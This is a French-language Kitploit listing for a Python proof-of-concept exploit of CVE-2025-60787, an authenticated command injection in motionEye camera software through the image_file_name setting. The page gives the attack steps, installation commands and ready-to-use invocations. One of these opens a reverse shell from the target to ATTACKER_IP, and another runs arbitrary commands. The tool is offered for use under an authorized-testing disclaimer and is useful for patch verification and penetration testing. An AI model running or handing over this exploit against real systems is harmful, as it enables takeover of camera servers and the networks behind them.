Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-60787-POC — Python PoC pour CVE-2025-60787, injection de commandes OS authentifiée (RCE) dans motionEye <= 0.43.1b4 via la configuration non assainie de image_file_name | Kitploit
Outils/GitHubGitHub/d3vn0mi/cve-2025-60787-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHubd3vn0mi/cve-2025-60787-poc

CVE-2025-60787-POC

Python PoC pour CVE-2025-60787, injection de commandes OS authentifiée (RCE) dans motionEye <= 0.43.1b4 via la configuration non assainie de image_file_name

Voir le dépôt
2il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-60787 - RCE authentifié sur motionEye

Exécution de code à distance authentifiée dans motionEye <= 0.43.1b4 via un paramètre de configuration motion non nettoyé

Auteur : d3vn0mi


Présentation de la vulnérabilité

ChampDétails
Identifiant CVECVE-2025-60787
Score CVSS7.2 (Élevé)
TypeInjection de commandes OS (CWE-78)
AffectémotionEye <= 0.43.1b4
Corrigé dans0.43.1b5

motionEye accepte des chaînes arbitraires dans les champs de configuration tels que image_file_name et les écrit directement dans les fichiers de configuration de Motion (/etc/motioneye/camera-*.conf). Lorsque le service Motion redémarre, il interprète ces champs comme des chaînes expansibles par le shell, permettant à un attaquant authentifié d'injecter et d'exécuter des commandes OS arbitraires.

L'interface web inclut une validation côté client pour ces champs, mais cela peut être facilement contourné en envoyant directement des requêtes API malveillantes.

Schéma d'attaque

  1. S'authentifier auprès de motionEye avec des identifiants administrateur valides
  2. Récupérer la liste des configurations de caméra
  3. POSTer une configuration modifiée avec une valeur malveillante de image_file_name
  4. Motion traite la commande injectée lors de la prise de captures (via capture_mode: interval-snapshots)

Prérequis

  • Python 3.6+
  • Bibliothèque requests
  • Identifiants administrateur motionEye valides
  • Accès réseau à l'instance motionEye cible

Installation

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2025-60787-POC.git
cd CVE-2025-60787-POC
pip install -r requirements.txt

Utilisation

L'exploit prend en charge deux modes : reverse shell et exécution de commandes.

Reverse Shell

Démarrez un écouteur sur votre machine, puis exécutez :

root@kitploit:~
python3 exploit.py revshell \
    --url http://TARGET:8765 \
    --user admin \
    --password SECRET \
    -i ATTACKER_IP \
    --port 4444

Exécution de commande

root@kitploit:~
python3 exploit.py command \
    --url http://TARGET:8765 \
    --user admin \
    --password SECRET \
    -e "id; whoami"

Options

OptionDescription
--urlURL cible de motionEye (port inclus)
--userNom d'utilisateur motionEye
--passwordMot de passe motionEye
-i / --hostIP de l'écouteur (mode revshell)
--portPort de l'écouteur (mode revshell)
-e / --execCommande à exécuter (mode commande)
--camera-idCibler un ID de caméra spécifique
--shUtiliser /bin/sh au lieu de /bin/bash
--no-verifyIgnorer la vérification du certificat TLS
--proxyRouter le trafic via un proxy (ex. http://127.0.0.1:8080)

Références

  • Avis GitHub - GHSA-j945-qm58-4gjx
  • Exploit-DB #52481
  • Module Rapid7 Metasploit
  • Projet motionEye

Crédits

  • d3vn0mi - Développement de l'exploit et des outils
  • gunzf0x - Découverte et recherche originales du CVE

Avertissement

Cet outil est fourni uniquement pour des tests de sécurité autorisés et à des fins éducatives. L'accès non autorisé à des systèmes informatiques est illégal. L'auteur décline toute responsabilité en cas d'utilisation abusive de ce logiciel. Obtenez toujours une autorisation appropriée avant de tester.

Licence

Ce projet est sous licence MIT License.

Télécharger l’outil